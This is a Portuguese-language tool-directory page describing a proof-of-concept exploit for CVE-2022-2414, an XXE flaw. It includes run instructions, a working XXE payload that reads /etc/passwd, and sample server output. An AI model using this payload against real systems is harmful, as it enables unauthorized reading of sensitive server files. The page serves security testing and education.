Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-2414 — é um script PoC para demonstrar a exploração de uma vulnerabilidade XML External Entity (XXE) | Kitploit
Ferramentas/GitHubGitHub/geniuszly/cve-2022-2414
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubgeniuszly/cve-2022-2414

CVE-2022-2414

é um script PoC para demonstrar a exploração de uma vulnerabilidade XML External Entity (XXE)

Ver Repositório
3há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

GenXMLExternalEntityExploit é um script PoC para demonstrar a exploração de vulnerabilidade de Entidade Externa XML (XXE). O script utiliza payloads XML para ler arquivos sensíveis de um servidor alvo. Pode ser útil para testes de segurança, testes de penetração ou fins educacionais.

Funcionalidades

  • Envia um payload XML personalizado para um servidor especificado.
  • Explora vulnerabilidades XXE para ler arquivos do servidor.
  • URL alvo e dados do payload facilmente customizáveis.

Como usar

  1. Clone o repositório
    root@kitploit:~
    git clone https://github.com/geniuszly/CVE-2022-2414
    
  2. Navegue até o diretório
    root@kitploit:~
    cd CVE-2022-2414
    
  3. Execute o script Certifique-se de ter o Python instalado em sua máquina.
    root@kitploit:~
    python3 GenXMLExternalEntityExploit.py
    

Configuração

  • TARGET_URL: Atualize a variável TARGET_URL no script para apontar para o servidor alvo que deseja testar.
  • XML_PAYLOAD: Personalize a string XML_PAYLOAD no script para caminhos de arquivos específicos ou operações no lado do servidor.
  • HEADERS: Modifique os cabeçalhos HTTP conforme necessário.

Exemplo

Por padrão, o script utiliza o seguinte payload para ler o arquivo /etc/passwd:

root@kitploit:~
<!--?xml version="1.0" ?-->
<!DOCTYPE xmlData [<!ENTITY fetchFile SYSTEM "file:///etc/passwd"> ]>
<CertEnrollmentRequest>
  <Attributes/>
  <ProfileID>&fetchFile;</ProfileID>
</CertEnrollmentRequest>

Exemplo de saída

root@kitploit:~
Инициализация отправки XML-пейлоада на сервер...
Статус-код ответа: 200
Содержимое XML-ответа:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nологin
...

Aviso

Esta ferramenta é destinada apenas para fins educacionais e testes de segurança autorizados. O autor não se responsabiliza por qualquer uso ilegal desta ferramenta.

Baixar ferramenta